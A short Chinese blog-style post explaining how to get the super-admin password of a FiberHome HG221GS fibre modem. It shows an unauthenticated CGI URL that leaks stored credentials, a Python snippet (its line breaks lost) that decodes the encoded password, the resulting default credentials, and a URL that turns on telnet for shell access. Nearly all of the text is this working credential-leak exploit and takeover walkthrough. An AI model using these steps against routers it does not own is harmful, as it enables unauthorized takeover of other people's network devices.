闲来无事想配置一下ipv6,需要光猫的超级管理密码,查了一下资料,做了如下整理和修正:
查看光猫后面板,确定设备型号HG221GS,默认终端配置地址192.168.1.1、账号useradmin、密码9CD2H;
根据设备型号HG221GS,上网查找资料,参考网上的方法,输入:
http://192.168.1.1/cgi-bin/baseinfoSet.cgi
获得光猫的基本配置信息,不需要登陆。其他型号的光猫可以尝试扫描其他关键字。
找到关键信息
"baseinfoSet_TELECOMACCOUNT":"telecomadmin","baseinfoSet_TELECOMPASSWORD":"114&73&55&110&69&37&53&113&","baseinfoSet_USERACCOUNT":"useradmin","baseinfoSet_USERPASSWORD":"57&71&72&50&76&",
通过观察9CD2H与57&71&72&50&76&的对应关系(ASCII码),进行解码,如下所示:
'''a program to decode FiberHome HG221GS FiberCat telecomadmin password wget http://192.168.1.1/cgi-bin/baseinfoSet.cgi"baseinfoSet_TELECOMACCOUNT":"telecomadmin","baseinfoSet_TELECOMPASSWORD":"114&73&55&110&69&37&53&113&","baseinfoSet_USERACCOUNT":"useradmin","baseinfoSet_USERPASSWORD":"57&71&72&50&76&",设备类型EPON生产厂家FiberHome设备型号:HG221GS硬件版本号:HS.V2.0软件版本号:E60D1.00MA000'''code='114&73&55&110&69&37&53&113&'[:-1] # "baseinfoSet_TELECOMPASSWORD":"114&73&55&110&69&37&53&113&"list=map(int,code.split('&'))result=[]for i in list:if i > 57:i-=4result.append(chr(i))print (''.join(result)) # output password:nE7jA%5m
随便找个python的线上编辑器,运行上述代码,得到默认密码nE7jA%5m
输入超级管理员账号:telecomadmin 密码:nE7jA%5m 登陆成功开启talent:http://192.168.1.1/cgi-bin/telnetenable.cgi?telnetenable=1,尝试sh,开启新的探索